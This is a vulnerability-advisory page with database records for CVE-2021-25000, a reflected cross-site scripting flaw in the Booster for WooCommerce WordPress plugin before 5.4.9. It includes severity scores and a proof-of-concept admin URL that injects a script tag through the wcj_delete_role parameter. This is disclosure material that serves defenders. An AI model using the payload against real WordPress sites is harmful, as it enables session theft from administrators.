Description
The plugin does not sanitise and escape the wcj_delete_role parameter before outputting back in the admin dashboard when the General module is enabled, leading to a Reflected Cross-Site Scripting issue
### PoC
The "General" module needs to be enabled in "Woocommerce -> Booster Settings -> Booster". https://example.com/wp-admin/admin.php?page=wcj-tools&tab;=custom_roles&wcj;_delete_role=
Affected Software
Related
{"id": "WPVDB-ID:BC167B3A-24EE-4988-9934-189B6216CE40", "vendorId": null, "type": "wpvulndb", "bulletinFamily": "software", "title": "Booster for WooCommerce < 5.4.9 - Reflected Cross-Site Scripting in General Module", "description": "The plugin does not sanitise and escape the wcj_delete_role parameter before outputting back in the admin dashboard when the General module is enabled, leading to a Reflected Cross-Site Scripting issue\n\n### PoC\n\nThe \"General\" module needs to be enabled in \"Woocommerce -> Booster Settings -> Booster\". https://example.com/wp-admin/admin.php?page=wcj-tools&tab;=custom_roles&wcj;_delete_role=", "published": "2021-12-01T00:00:00", "modified": "2021-12-01T08:29:47", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "accessVector": "NETWORK", "accessComplexity": "HIGH", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE", "baseScore": 2.6}, "severity": "LOW", "exploitabilityScore": 4.9, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://wpscan.com/vulnerability/bc167b3a-24ee-4988-9934-189b6216ce40", "reporter": "Jeremie Amsellem", "references": [], "cvelist": ["CVE-2021-25000"], "immutableFields": [], "lastseen": "2022-01-17T19:17:20", "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-25000"]}, {"type": "patchstack", "idList": ["PATCHSTACK:812953635462C00428862082023BF5AC"]}, {"type": "wpexploit", "idList": ["WPEX-ID:BC167B3A-24EE-4988-9934-189B6216CE40"]}]}, "score": {"value": 0.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-25000"]}, {"type": "wpexploit", "idList": ["WPEX-ID:BC167B3A-24EE-4988-9934-189B6216CE40"]}]}, "exploitation": null, "affected_software": {"major_version": [{"name": "woocommerce-jetpack", "version": 5}]}, "epss": [{"cve": "CVE-2021-25000", "epss": "0.000820000", "percentile": "0.333600000", "modified": "2023-03-18"}], "vulnersScore": 0.5}, "affectedSoftware": [{"version": "5.4.9", "operator": "lt", "name": "woocommerce-jetpack"}], "exploit": "The \"General\" module needs to be enabled in \"Woocommerce -> Booster Settings -> Booster\".\r\n\r\nhttps://example.com/wp-admin/admin.php?page=wcj-tools&tab=custom_roles&wcj_delete_role=<script>alert(/XSS/)<%2Fscript>", "sourceData": "", "generation": 0, "_state": {"dependencies": 1660004461, "score": 1660007483, "affected_software_major_version": 1666695388, "epss": 1679176287}, "_internal": {"score_hash": "27b64c64ccf70358f737c760b7fa9189"}}
{"cve": [{"lastseen": "2023-02-09T14:12:24", "description": "The Booster for WooCommerce WordPress plugin before 5.4.9 does not sanitise and escape the wcj_delete_role parameter before outputting back in the admin dashboard when the General module is enabled, leading to a Reflected Cross-Site Scripting issue", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2022-01-03T13:15:00", "type": "cve", "title": "CVE-2021-25000", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25000"], "modified": "2022-01-08T02:35:00", "cpe": [], "id": "CVE-2021-25000", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-25000", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}, "cpe23": []}], "patchstack": [{"lastseen": "2022-06-01T19:28:20", "description": "Reflected Cross-Site Scripting (XSS) vulnerability in PDF Invoicing Module discovered by Jeremie Amsellem in WordPress Booster for Woocommerce plugin (versions <= 5.4.8).\n\n## Solution\n\n\r\n Update the WordPress Booster for Woocommerce plugin to the latest available version (at least 5.4.9).\r\n ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-12-01T00:00:00", "type": "patchstack", "title": "WordPress Booster for Woocommerce plugin <= 5.4.8 - Reflected Cross-Site Scripting (XSS) vulnerability in General Module", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25000"], "modified": "2021-12-01T00:00:00", "id": "PATCHSTACK:812953635462C00428862082023BF5AC", "href": "https://patchstack.com/database/vulnerability/woocommerce-jetpack/wordpress-booster-for-woocommerce-plugin-5-4-8-reflected-cross-site-scripting-xss-vulnerability-in-general-module", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}}], "cnvd": [{"lastseen": "2022-10-13T18:50:23", "description": "WordPress is a set of blogging platform developed using the PHP language. A cross-site scripting vulnerability exists in the WordPress plugin Booster for WooCommerce. The vulnerability stems from the program not filtering and escaping the wcj_delete_role parameter before exporting it back to the administration page. An attacker could use this vulnerability to steal cookie-based authentication credentials.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2022-01-05T00:00:00", "type": "cnvd", "title": "WordPress plugin Booster for WooCommerce cross-site scripting vulnerability", "bulletinFamily": "cnvd", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25000"], "modified": "2022-10-13T00:00:00", "id": "CNVD-2022-68539", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-68539", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}}], "wpexploit": [{"lastseen": "2022-01-17T19:17:20", "description": "The plugin does not sanitise and escape the wcj_delete_role parameter before outputting back in the admin dashboard when the General module is enabled, leading to a Reflected Cross-Site Scripting issue\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-12-01T00:00:00", "type": "wpexploit", "title": "Booster for WooCommerce < 5.4.9 - Reflected Cross-Site Scripting in General Module", "bulletinFamily": "exploit", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25000"], "modified": "2021-12-01T08:29:47", "id": "WPEX-ID:BC167B3A-24EE-4988-9934-189B6216CE40", "href": "", "sourceData": "The \"General\" module needs to be enabled in \"Woocommerce -> Booster Settings -> Booster\".\r\n\r\nhttps://example.com/wp-admin/admin.php?page=wcj-tools&tab=custom_roles&wcj_delete_role=<script>alert(/XSS/)<%2Fscript>", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}}]}
Booster for WooCommerce < 5.4.9 - Reflected Cross-Site Scripting in General Module
